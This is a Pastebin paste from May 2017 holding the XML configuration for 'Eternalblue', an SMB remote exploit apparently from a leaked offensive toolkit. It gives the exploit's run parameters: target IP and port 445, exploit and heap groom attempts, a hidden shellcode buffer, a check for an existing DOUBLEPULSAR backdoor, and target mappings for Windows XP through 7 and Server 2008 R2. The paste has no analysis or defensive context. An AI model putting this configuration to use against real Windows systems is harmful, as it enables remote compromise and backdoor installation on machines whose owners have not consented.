SHARE
TWEET

Eternalblue

a guest May 19th, 2017 49 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <?xml version='1.0' encoding='utf-8'?>
  2. <config xmlns='urn:trch' name='Eternalblue' version='2.2.0' schemaversion='2.1.0' configversion='2.2.0.0' id='0f38f55b6a88feccfb846d3d10ab4687e652e63e'>
  3.   <inputparameters>
  4.     <parameter hidden='true' type='TcpPort' name='DaveProxyPort' description='DAVE Core/Proxy Hookup connection port'>
  5.       <default>0</default>
  6.     </parameter>
  7.     <parameter type='S16' name='NetworkTimeout' description='Timeout for blocking network calls (in seconds). Use -1 for no timeout.'>
  8.       <default>60</default>
  9.     </parameter>
  10.     <parameter xdevmap='TARGET_IP_V4_ADDRESS' type='IPv4' name='TargetIp' description='Target IP Address'/>
  11.     <parameter xdevmap='TARGET_PORT' type='TcpPort' name='TargetPort' description='Port used by the SMB service for exploit connection'>
  12.       <default>445</default>
  13.     </parameter>
  14.     <parameter xdevmap='ETERNALBLUE_VALIDATE_TARGET' type='Boolean' name='VerifyTarget' description='Validate the SMB string from target against the target selected before exploitation.'>
  15.       <default>true</default>
  16.     </parameter>
  17.     <parameter xdevmap='ETERNALBLUE_VALIDATE_BACKDOOR' type='Boolean' name='VerifyBackdoor' description='Validate the presence of the DOUBLE PULSAR backdoor before throwing. This option must be enabled for multiple exploit attempts.'>
  18.       <default>true</default>
  19.     </parameter>
  20.     <parameter xdevmap='ETERNALBLUE_MAX_EXPLOIT_ATTEMPTS' type='U32' name='MaxExploitAttempts' description='Number of times to attempt the exploit and groom. Disabled for XP/2K3.'>
  21.       <default>3</default>
  22.     </parameter>
  23.     <parameter xdevmap='ETERNALBLUE_NUMBER_SPRAY_ALLOCATIONS' type='U32' name='GroomAllocations' description='Number of large SMBv2 buffers (Vista+) or SessionSetup allocations (XK/2K3) to do.'>
  24.       <default>12</default>
  25.     </parameter>
  26.     <parameter name='ShellcodeBuffer' required='false' xdevmap='EXPLOIT_SHELLCODE' hidden='true' type='Buffer' description="Shellcode buffer in hex (hint: use 'F:&lt;FILENAME&gt;' to load from file)"/>
  27.     <paramchoice xdevmap='TARGET_PLATFORM' name='Target' description='Operating System, Service Pack, and Architecture of target OS'>
  28.       <value>WIN72K8R2</value>
  29.       <paramgroup name='XP' description='Windows XP 32-Bit All Service Packs'/>
  30.       <paramgroup name='WIN72K8R2' description='Windows 7 and 2008 R2 32-Bit and 64-Bit All Service Packs'/>
  31.     </paramchoice>
  32.   </inputparameters>
  33.   <outputparameters>
  34.     <parameter xdevmap='ETERNALBLUE_DOUBLEPULSAR_PRESENT' type='Boolean' name='DoublePulsarPresent' description='Set to true if the DOUBLEPULSAR backdoor was already installed and the exploit did not have to be thrown'/>
  35.   </outputparameters>
  36.   <redirection>
  37.     <local protocol='TCP' listenaddr='TargetIp' listenport='TargetPort' closeoncompletion='true' destaddr='//identifier' destport="//service[name='SMB']/port"/>
  38.   </redirection>
  39.   <logic>
  40.     <and>
  41.       <service name='smb'>
  42.         <bindtovalue name='Protocol' value='SMB'/>
  43.         <bindtopath path="//service[name='smb']/port" name='TargetPort'/>
  44.       </service>
  45.       <or>
  46.         <os name='Windows XP' family='windows' architecture='x86 32-bit'>
  47.           <bindtovalue name='Target' value='XP'/>
  48.         </os>
  49.         <os servicepack='0' name='Windows XP' family='windows' architecture='x86 32-bit'>
  50.           <bindtovalue name='Target' value='XP'/>
  51.         </os>
  52.         <os servicepack='1' name='Windows XP' family='windows' architecture='x86 32-bit'>
  53.           <bindtovalue name='Target' value='XP'/>
  54.         </os>
  55.         <os servicepack='2' name='Windows XP' family='windows' architecture='x86 32-bit'>
  56.           <bindtovalue name='Target' value='XP'/>
  57.         </os>
  58.         <os servicepack='3' name='Windows XP' family='windows' architecture='x86 32-bit'>
  59.           <bindtovalue name='Target' value='XP'/>
  60.         </os>
  61.         <os servicepack='0' name='Windows 2003' family='windows' architecture='x86 32-bit'>
  62.           <bindtovalue name='Target' value='W2K3SP0'/>
  63.         </os>
  64.         <os servicepack='1' name='Windows 2003' family='windows' architecture='x86 32-bit'>
  65.           <bindtovalue name='Target' value='W2K3SP1SP2'/>
  66.         </os>
  67.         <os servicepack='2' name='Windows 2003' family='windows' architecture='x86 32-bit'>
  68.           <bindtovalue name='Target' value='W2K3SP1SP2'/>
  69.         </os>
  70.         <os servicepack='1' name='Windows 2003' family='windows' architecture='x64 64-bit'>
  71.           <bindtovalue name='Target' value='W2K3X64'/>
  72.         </os>
  73.         <os servicepack='2' name='Windows 2003' family='windows' architecture='x64 64-bit'>
  74.           <bindtovalue name='Target' value='W2K3X64'/>
  75.         </os>
  76.         <os servicepack='0' name='Windows Vista' family='windows' architecture='x86 32-bit'>
  77.           <bindtovalue name='Target' value='VISTA2K8X86'/>
  78.         </os>
  79.         <os servicepack='1' name='Windows Vista' family='windows' architecture='x86 32-bit'>
  80.           <bindtovalue name='Target' value='VISTA2K8X86'/>
  81.         </os>
  82.         <os servicepack='2' name='Windows Vista' family='windows' architecture='x86 32-bit'>
  83.           <bindtovalue name='Target' value='VISTA2K8X86'/>
  84.         </os>
  85.         <os servicepack='0' name='Windows Vista' family='windows' architecture='x64 64-bit'>
  86.           <bindtovalue name='Target' value='VISTA2K8X64'/>
  87.         </os>
  88.         <os servicepack='1' name='Windows Vista' family='windows' architecture='x64 64-bit'>
  89.           <bindtovalue name='Target' value='VISTA2K8X64'/>
  90.         </os>
  91.         <os servicepack='2' name='Windows Vista' family='windows' architecture='x64 64-bit'>
  92.           <bindtovalue name='Target' value='VISTA2K8X64'/>
  93.         </os>
  94.         <os servicepack='0' name='Windows 2008' family='windows' architecture='x86 32-bit'>
  95.           <bindtovalue name='Target' value='VISTA2K8X86'/>
  96.         </os>
  97.         <os servicepack='1' name='Windows 2008' family='windows' architecture='x86 32-bit'>
  98.           <bindtovalue name='Target' value='VISTA2K8X86'/>
  99.         </os>
  100.         <os servicepack='2' name='Windows 2008' family='windows' architecture='x86 32-bit'>
  101.           <bindtovalue name='Target' value='VISTA2K8X86'/>
  102.         </os>
  103.         <os servicepack='0' name='Windows 2008' family='windows' architecture='x64 64-bit'>
  104.           <bindtovalue name='Target' value='VISTA2K8X64'/>
  105.         </os>
  106.         <os servicepack='1' name='Windows 2008' family='windows' architecture='x64 64-bit'>
  107.           <bindtovalue name='Target' value='VISTA2K8X64'/>
  108.         </os>
  109.         <os servicepack='2' name='Windows 2008' family='windows' architecture='x64 64-bit'>
  110.           <bindtovalue name='Target' value='VISTA2K8X64'/>
  111.         </os>
  112.         <os servicepack='0' name='Windows 2008 R2' family='windows' architecture='x64 64-bit'>
  113.           <bindtovalue name='Target' value='WIN72K8R2'/>
  114.         </os>
  115.         <os servicepack='1' name='Windows 2008 R2' family='windows' architecture='x64 64-bit'>
  116.           <bindtovalue name='Target' value='WIN72K8R2'/>
  117.         </os>
  118.         <os servicepack='0' name='Windows 7' family='windows' architecture='x86 32-bit'>
  119.           <bindtovalue name='Target' value='WIN72K8R2'/>
  120.         </os>
  121.         <os servicepack='1' name='Windows 7' family='windows' architecture='x86 32-bit'>
  122.           <bindtovalue name='Target' value='WIN72K8R2'/>
  123.         </os>
  124.         <os servicepack='0' name='Windows 7' family='windows' architecture='x64 64-bit'>
  125.           <bindtovalue name='Target' value='WIN72K8R2'/>
  126.         </os>
  127.         <os servicepack='1' name='Windows 7' family='windows' architecture='x64 64-bit'>
  128.           <bindtovalue name='Target' value='WIN72K8R2'/>
  129.         </os>
  130.       </or>
  131.     </and>
  132.   </logic>
  133. </config>
RAW Paste Data
Challenge yourself this year...
Learn something new in 2017
Top